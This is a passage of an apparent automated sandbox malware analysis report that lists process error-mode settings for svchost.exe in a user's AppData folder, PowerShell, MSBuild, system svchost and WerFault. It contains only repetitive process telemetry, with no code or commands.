                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
